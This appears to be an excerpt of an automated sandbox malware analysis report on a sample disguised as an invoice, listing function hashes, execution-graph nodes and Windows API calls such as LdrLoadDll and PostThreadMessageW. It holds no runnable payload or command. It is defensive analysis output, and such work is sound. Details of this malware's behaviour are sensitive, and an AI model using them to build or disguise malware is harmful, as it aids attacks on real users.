                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1688425022.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8bd000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 570e729502aab2fe5eb52bd119d2482a58cd18629ab6daf737da151a2c2d79cd
                                  • Instruction ID: 5d10db573b1a995d40c1407869caa69f4ef4c9f5c7c41e541dab95d926c7a86f
                                  • Opcode Fuzzy Hash: 570e729502aab2fe5eb52bd119d2482a58cd18629ab6daf737da151a2c2d79cd
                                  • Instruction Fuzzy Hash: 622180755087809FCB02DF14D994B11BFB1FB46314F28C5EAD8498F2A7D33A981ACB62
                                  Function 008BD1CF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1688425022.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8bd000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                  • Instruction ID: 172bfbe34f7cf68ecb2fab27c60a191ec54482b52849bafea4e7ccdbee5265c4
                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                  • Instruction Fuzzy Hash: B111A975904280EFCB02CF10C5C4B15BBA2FB84324F24C6A9D8498B396C33AE80ACB61

                                  Non-executed Functions

                                  Function 070E8350 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PH^q$PH^q
                                  • API String ID: 0-1598597984
                                  • Opcode ID: c912e9ab9e7fbcd4cc499dd88e28d1140c103a313315bc7fb151e6c096be91ee
                                  • Instruction ID: bd5d82f311d77a25e703fdfa97da1de31f65ff48025feb159766ebb96222d63b
                                  • Opcode Fuzzy Hash: c912e9ab9e7fbcd4cc499dd88e28d1140c103a313315bc7fb151e6c096be91ee
                                  • Instruction Fuzzy Hash: FCD1C3B4A00605CFDB48CF69C598AA9B7F5BF4D301F2591A9E406AB3B1DB31AD40CF60
                                  Function 070E1DD0 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c18b7a79f863515bb13cd76e4ea727ec0e77f988423487755ba6ebc4d4d08927
                                  • Instruction ID: c7744d45e516d823a903362a8d4dac8a0f002ac95cf236deafd5540884de097e
                                  • Opcode Fuzzy Hash: c18b7a79f863515bb13cd76e4ea727ec0e77f988423487755ba6ebc4d4d08927
                                  • Instruction Fuzzy Hash: 6CE1D9B4E001198FCB14DFA9C9909AEFBF6BF89305F24C269D514AB359D730A941CF61
                                  Function 070E2208 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b66bff5059b2985b508d4bdcde4acd78c3ca4cb9796b75f45145d7a2887b26e6
                                  • Instruction ID: 32c364d6913b4986f42e8b378822f76fa6d43cb31482849c0db033a1adcd08b3
                                  • Opcode Fuzzy Hash: b66bff5059b2985b508d4bdcde4acd78c3ca4cb9796b75f45145d7a2887b26e6
                                  • Instruction Fuzzy Hash: 9AE1E8B4E005198FCB14DFA9C5909AEFBF6BF89305F24C269D414AB359DB30A941CFA1
                                  Function 070E3A08 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 76431590a5b80bb35858ab130b47b3a2b542734f01007d18870a1efb54c135f0
                                  • Instruction ID: 64109bd36f4b5ad9a1f52e36e7f0b44eed2c9fe779742d88c36531a101ad6ec4
                                  • Opcode Fuzzy Hash: 76431590a5b80bb35858ab130b47b3a2b542734f01007d18870a1efb54c135f0
                                  • Instruction Fuzzy Hash: 4FE1D5B4E001198FCB14DFA9C5809AEFBF6BF89305F248269D415AB359DB30A941CFA1
                                  Function 070E42E0 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: da79063247a976fea600168cc0dcb36ee221d6e15c56db9c4ebb790e3f6ae50f
                                  • Instruction ID: 0e8fe808891e5db9f8ad6890580b847b401d5e971d49b46bec877a4e2334dfdb
                                  • Opcode Fuzzy Hash: da79063247a976fea600168cc0dcb36ee221d6e15c56db9c4ebb790e3f6ae50f
                                  • Instruction Fuzzy Hash: D5E1EAB4E001598FCB14DFA9C5809AEFBF6FF89305F248269E814AB356D730A945CF61
                                  Function 070E1998 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fca8c003fdffbeb871bc47bc5038c23bf717b0ae56cda7777fd25997e83c24f3
                                  • Instruction ID: f695f65048c0fa44525ad691b9019bfd7d8d8ec816bfa3159492bdd233c534af
                                  • Opcode Fuzzy Hash: fca8c003fdffbeb871bc47bc5038c23bf717b0ae56cda7777fd25997e83c24f3
                                  • Instruction Fuzzy Hash: C0E1D7B4E041198FCB14DFA9C5909AEFBF6BF89305F248269D414AB359DB30A941CFA1
                                  Function 00D6D5BC Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3e25aa8096df98513c9d495858c0c1467a7a2e5006bb2a8cf96436952d30b00
                                  • Instruction ID: cae7e37ebfb6a8647eb9d1315b3245171f16c1705490900cdbaa49c2b786414c
                                  • Opcode Fuzzy Hash: a3e25aa8096df98513c9d495858c0c1467a7a2e5006bb2a8cf96436952d30b00
                                  • Instruction Fuzzy Hash: 37A14A36E00609CFCF05DFA4D88059EB7B2FF89300B1585BAE805AB265DB75E915CBA0

                                  Execution Graph

                                  Execution Coverage:1.2%
                                  Dynamic/Decrypted Code Coverage:5.1%
                                  Signature Coverage:8%
                                  Total number of Nodes:138
                                  Total number of Limit Nodes:8
                                  execution_graph 92595 4247e3 92600 4247fc 92595->92600 92596 42488c 92597 424844 92603 42e093 92597->92603 92600->92596 92600->92597 92601 424887 92600->92601 92602 42e093 RtlFreeHeap 92601->92602 92602->92596 92606 42c363 92603->92606 92605 424854 92607 42c37d 92606->92607 92608 42c38e RtlFreeHeap 92607->92608 92608->92605 92616 42f253 92617 42f263 92616->92617 92618 42f269 92616->92618 92621 42e173 92618->92621 92620 42f28f 92624 42c313 92621->92624 92623 42e18e 92623->92620 92625 42c330 92624->92625 92626 42c341 RtlAllocateHeap 92625->92626 92626->92623 92627 424453 92628 42446f 92627->92628 92629 424497 92628->92629 92630 4244ab 92628->92630 92632 42bff3 NtClose 92629->92632 92631 42bff3 NtClose 92630->92631 92634 4244b4 92631->92634 92633 4244a0 92632->92633 92637 42e1b3 RtlAllocateHeap 92634->92637 92636 4244bf 92637->92636 92638 42b613 92639 42b62d 92638->92639 92642 1a52df0 LdrInitializeThunk 92639->92642 92640 42b655 92642->92640 92643 41ae13 92645 41ae57 92643->92645 92644 41ae78 92645->92644 92646 42bff3 NtClose 92645->92646 92646->92644 92647 41a0d3 92648 41a13f 92647->92648 92649 41a0e8 92647->92649 92649->92648 92651 41dfc3 92649->92651 92652 41dfe9 92651->92652 92656 41e0e0 92652->92656 92657 42f383 92652->92657 92654 41e081 92654->92656 92663 42b663 92654->92663 92656->92648 92658 42f2f3 92657->92658 92659 42f350 92658->92659 92660 42e173 RtlAllocateHeap 92658->92660 92659->92654 92661 42f32d 92660->92661 92662 42e093 RtlFreeHeap 92661->92662 92662->92659 92664 42b67d 92663->92664 92667 1a52c0a 92664->92667 92665 42b6a9 92665->92656 92668 1a52c11 92667->92668 92669 1a52c1f LdrInitializeThunk 92667->92669 92668->92665 92669->92665 92670 413b93 92671 413bac 92670->92671 92676 4172f3 92671->92676 92673 413bc7 92674 413c13 92673->92674 92675 413c00 PostThreadMessageW 92673->92675 92675->92674 92677 417317 92676->92677 92678 417353 LdrLoadDll 92677->92678 92679 41731e 92677->92679 92678->92679 92679->92673 92680 413692 92681 413635 92680->92681 92683 413652 92680->92683 92684 42c273 92681->92684 92685 42c28d 92684->92685 92688 1a52c70 LdrInitializeThunk 92685->92688 92686 42c2b5 92686->92683 92688->92686 92689 401994 92691 40199b 92689->92691 92690 401a58 92691->92690 92693 42f723 92691->92693 92696 42dc53 92693->92696 92697 42dc79 92696->92697 92708 407463 92697->92708 92699 42dc8f 92700 42dceb 92699->92700 92711 41ac23 92699->92711 92700->92690 92702 42dcae 92703 42dcc3 92702->92703 92726 42c3b3 92702->92726 92722 427d23 92703->92722 92706 42dcdd 92707 42c3b3 ExitProcess 92706->92707 92707->92700 92729 415fb3 92708->92729 92710 407470 92710->92699 92712 41ac4f 92711->92712 92740 41ab13 92712->92740 92715 41ac94 92718 41acb0 92715->92718 92720 42bff3 NtClose 92715->92720 92716 41ac7c 92717 41ac87 92716->92717 92719 42bff3 NtClose 92716->92719 92717->92702 92718->92702 92719->92717 92721 41aca6 92720->92721 92721->92702 92723 427d84 92722->92723 92725 427d91 92723->92725 92751 418163 92723->92751 92725->92706 92727 42c3cd 92726->92727 92728 42c3de ExitProcess 92727->92728 92728->92703 92730 415fd0 92729->92730 92732 415fe9 92730->92732 92733 42ca53 92730->92733 92732->92710 92735 42ca6d 92733->92735 92734 42ca9c 92734->92732 92735->92734 92736 42b663 LdrInitializeThunk 92735->92736 92737 42cafc 92736->92737 92738 42e093 RtlFreeHeap 92737->92738 92739 42cb15 92738->92739 92739->92732 92741 41ac09 92740->92741 92742 41ab2d 92740->92742 92741->92715 92741->92716 92746 42b703 92742->92746 92745 42bff3 NtClose 92745->92741 92747 42b720 92746->92747 92750 1a535c0 LdrInitializeThunk 92747->92750 92748 41abfd 92748->92745 92750->92748 92752 41818d 92751->92752 92753 41868b 92752->92753 92759 413813 92752->92759 92753->92725 92755 4182ba 92755->92753 92756 42e093 RtlFreeHeap 92755->92756 92757 4182d2 92756->92757 92757->92753 92758 42c3b3 ExitProcess 92757->92758 92758->92753 92763 413830 92759->92763 92761 41388c 92761->92755 92762 413896 92762->92755 92763->92762 92764 41af33 RtlFreeHeap LdrInitializeThunk 92763->92764 92764->92761 92609 1a52b60 LdrInitializeThunk 92610 4188a8 92613 42bff3 92610->92613 92612 4188b2 92614 42c010 92613->92614 92615 42c021 NtClose 92614->92615 92615->92612

                                  Executed Functions

                                  Function 004172F3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 89 4172f3-41730f 90 417317-41731c 89->90 91 417312 call 42ed93 89->91 92 417322-417330 call 42f393 90->92 93 41731e-417321 90->93 91->90 96 417340-417351 call 42d723 92->96 97 417332-41733d call 42f633 92->97 102 417353-417367 LdrLoadDll 96->102 103 41736a-41736d 96->103 97->96 102->103
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417365
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 6555885b03e424912a974b2ad71a9bf35cbf2a7f4b5f4a85ec69b3e21490f823
                                  • Instruction ID: d0811db12d0f146c06d79ceb3f2dab9860b08131f12c425baa9d12ee8bf14660
                                  • Opcode Fuzzy Hash: 6555885b03e424912a974b2ad71a9bf35cbf2a7f4b5f4a85ec69b3e21490f823
                                  • Instruction Fuzzy Hash: 720152B1E0010DA7DB10DAE1DC42FDEB3789B54308F4041AAED1897240F634EB49CB55
                                  Function 0042BFF3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 109 42bff3-42c02f call 4047d3 call 42d233 NtClose
                                  APIs
                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C02A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: c34ef89e7b9cdae7ad94ebfb894588efeabc20d9fa43539f963b23359dc65b50
                                  • Instruction ID: 155e8618e93c42cb7bf45a07eaa79e030e7167f9385490bd2c7e5f42732bba29
                                  • Opcode Fuzzy Hash: c34ef89e7b9cdae7ad94ebfb894588efeabc20d9fa43539f963b23359dc65b50
                                  • Instruction Fuzzy Hash: 8BE04F766002147BD220AA5ADC42FDB776DDFC5714F40441AFA086B241C775B91186F5
                                  Function 01A52B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 123 1a52b60-1a52b6c LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 963c3f9bcc5d07a542c4337f73f94a8cf56b407463903b86c45559305d1a7e02
                                  • Instruction ID: f99dbf45330a9d6541f5a0d786528dbc763c334c7312451f74022077f878e627
                                  • Opcode Fuzzy Hash: 963c3f9bcc5d07a542c4337f73f94a8cf56b407463903b86c45559305d1a7e02
                                  • Instruction Fuzzy Hash: 7F9002A12025000341057158441461A400E97F0201F56C021E5014590DC52989916225
                                  Function 01A52DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 125 1a52df0-1a52dfc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9d2b6944517bb0fc15490213fe4284bddcd62861a4f005b9b4c5aaabf965169a
                                  • Instruction ID: 069dfe20283047bd95c30dfda9ef109241a7c5bbf036ecf7162b3d65c738108a
                                  • Opcode Fuzzy Hash: 9d2b6944517bb0fc15490213fe4284bddcd62861a4f005b9b4c5aaabf965169a
                                  • Instruction Fuzzy Hash: 5390027120150413D1117158450470B000D97E0241F96C412A4424558DD65A8A52A221
                                  Function 01A52C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 124 1a52c70-1a52c7c LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e93ea0af7f1274f3f80b29110ec9358a5ef318a8798f14f8708c678ba452e12e
                                  • Instruction ID: 507328234a6d25b41ea43eb735ebfd3258d4965db63bb2e8b0a305417978d97b
                                  • Opcode Fuzzy Hash: e93ea0af7f1274f3f80b29110ec9358a5ef318a8798f14f8708c678ba452e12e
                                  • Instruction Fuzzy Hash: 5B90027120158802D1107158840474E000D97E0301F5AC411A8424658DC69989917221
                                  Function 01A535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 126 1a535c0-1a535cc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6eb2d5abc27aa77c87d365667902295b5a83206261a69ff901c15f1a0ec4397c
                                  • Instruction ID: 9ef902c59e45d9fa6c9e292060b9602c7f807a9482a7405a8d9b49d2d7a09550
                                  • Opcode Fuzzy Hash: 6eb2d5abc27aa77c87d365667902295b5a83206261a69ff901c15f1a0ec4397c
                                  • Instruction Fuzzy Hash: 0A90027160560402D1007158451470A100D97E0201F66C411A4424568DC7998A5166A2
                                  Function 00413B88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(297268BLQ,00000111,00000000,00000000), ref: 00413C0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 297268BLQ$297268BLQ
                                  • API String ID: 1836367815-2296095138
                                  • Opcode ID: 1af129441032b496bd40eed0ce9d410f271536bea43bc203cbba9472e8e933f1
                                  • Instruction ID: 9fee5f7370640ccb0f943e733cf75d796cd6401a56ad5369163ceaf19d72f062
                                  • Opcode Fuzzy Hash: 1af129441032b496bd40eed0ce9d410f271536bea43bc203cbba9472e8e933f1
                                  • Instruction Fuzzy Hash: 9A114872E402187AEB20DA91CC02FDEBB78DF81B10F044059FA007B280E7B867028BD9
                                  Function 00413B93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 14 413b93-413ba3 15 413bac-413bfe call 42eb43 call 4172f3 call 404743 call 424903 14->15 16 413ba7 call 42e133 14->16 25 413c20-413c25 15->25 26 413c00-413c11 PostThreadMessageW 15->26 16->15 26->25 27 413c13-413c1d 26->27 27->25
                                  APIs
                                  • PostThreadMessageW.USER32(297268BLQ,00000111,00000000,00000000), ref: 00413C0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 297268BLQ$297268BLQ
                                  • API String ID: 1836367815-2296095138
                                  • Opcode ID: 208047ed80bebd8ca56128c23ae3e157862ca78c62b04f6beffd0e8f293f8384
                                  • Instruction ID: 6255a44e8c8f5c0889ef331e0fe61ac5b76c677aa3b3c5e7e49ac7416300411a
                                  • Opcode Fuzzy Hash: 208047ed80bebd8ca56128c23ae3e157862ca78c62b04f6beffd0e8f293f8384
                                  • Instruction Fuzzy Hash: 8401DB71E4025876EB2096919C02FDFBB7C9F41B14F044059FE047B281E6B8570687E9
                                  Function 0042C363 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 28 42c363-42c3a4 call 4047d3 call 42d233 RtlFreeHeap
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C39F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: D`A
                                  • API String ID: 3298025750-3975472815
                                  • Opcode ID: 0b935935a9d9b665681f9f846ad136466a8349b47cf30abd535d1b6c75b0e6ef
                                  • Instruction ID: a134c26ef84a2a4f5bf24abd6bc72dd655432f47ba180a3ec584b479eeffd2ea
                                  • Opcode Fuzzy Hash: 0b935935a9d9b665681f9f846ad136466a8349b47cf30abd535d1b6c75b0e6ef
                                  • Instruction Fuzzy Hash: ADE06DB5614304BBC610EE59DC41EEB73ACEFC5714F404059FA09A7241C774B9118BB5
                                  Function 0042C313 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 104 42c313-42c357 call 4047d3 call 42d233 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(?,0041E081,?,?,00000000,?,0041E081,?,?,?), ref: 0042C352
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 6f0cf94ae48c5e444ba0bc735870bf2409f609eddd7a64d5d078c79487ed6f59
                                  • Instruction ID: fe7f86bbdd520bdc572053dcc912469014bb562f93d2c6e71bd44db230938668
                                  • Opcode Fuzzy Hash: 6f0cf94ae48c5e444ba0bc735870bf2409f609eddd7a64d5d078c79487ed6f59
                                  • Instruction Fuzzy Hash: 3EE06DB57002047BD610EE59DC41EDB73ADEFC5714F400019FE08A7242C770BA118AB9
                                  Function 0042C3B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 114 42c3b3-42c3ec call 4047d3 call 42d233 ExitProcess
                                  APIs
                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,F3121F26,?,?,F3121F26), ref: 0042C3E7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: c19161363ccc2e7a333328da921f80d604decca90989d1272e64322321a710cb
                                  • Instruction ID: 502c90c13fd6c734b44df5e34100ab266e412ed8be16975681a8e27cb637c129
                                  • Opcode Fuzzy Hash: c19161363ccc2e7a333328da921f80d604decca90989d1272e64322321a710cb
                                  • Instruction Fuzzy Hash: 5CE08C36600614BBD220EE5ADC41F9BB76DEFC5714F40405EFA08A7241CB75BA1187F6
                                  Function 01A52C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 119 1a52c0a-1a52c0f 120 1a52c11-1a52c18 119->120 121 1a52c1f-1a52c26 LdrInitializeThunk 119->121
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8dc3e1334a01f9eae1f6fc07877ca0609ccd0f036d826536a6ed17871e6602c2
                                  • Instruction ID: 9f83e39550bdf0f2fd3e1d32c662047b1e49ea30b2320d57b138247469a760d7
                                  • Opcode Fuzzy Hash: 8dc3e1334a01f9eae1f6fc07877ca0609ccd0f036d826536a6ed17871e6602c2
                                  • Instruction Fuzzy Hash: 0BB09B719055C5C5DB51E764460871B790477D0701F16C072D6030641F473CC5D1E275

                                  Non-executed Functions

                                  Function 01A92349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2160512332
                                  • Opcode ID: 26f5ced46dde3635eb191cb1bfe91fc19a29c2a1a97d9017745b545f3fac1ca1
                                  • Instruction ID: 704082d9a0a096979e3517cd013992e3ba7583961dd04ec944770ef201a83c2a
                                  • Opcode Fuzzy Hash: 26f5ced46dde3635eb191cb1bfe91fc19a29c2a1a97d9017745b545f3fac1ca1
                                  • Instruction Fuzzy Hash: E8928071608342AFEB21DF29C880B6BB7E8BF84754F04491EFA95D7251D774E884CB92
                                  Function 01A48620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                  Download Yara Rule
                                  Strings
                                  • undeleted critical section in freed memory, xrefs: 01A8542B
                                  • double initialized or corrupted critical section, xrefs: 01A85508
                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A854E2
                                  • 8, xrefs: 01A852E3
                                  • Critical section debug info address, xrefs: 01A8541F, 01A8552E
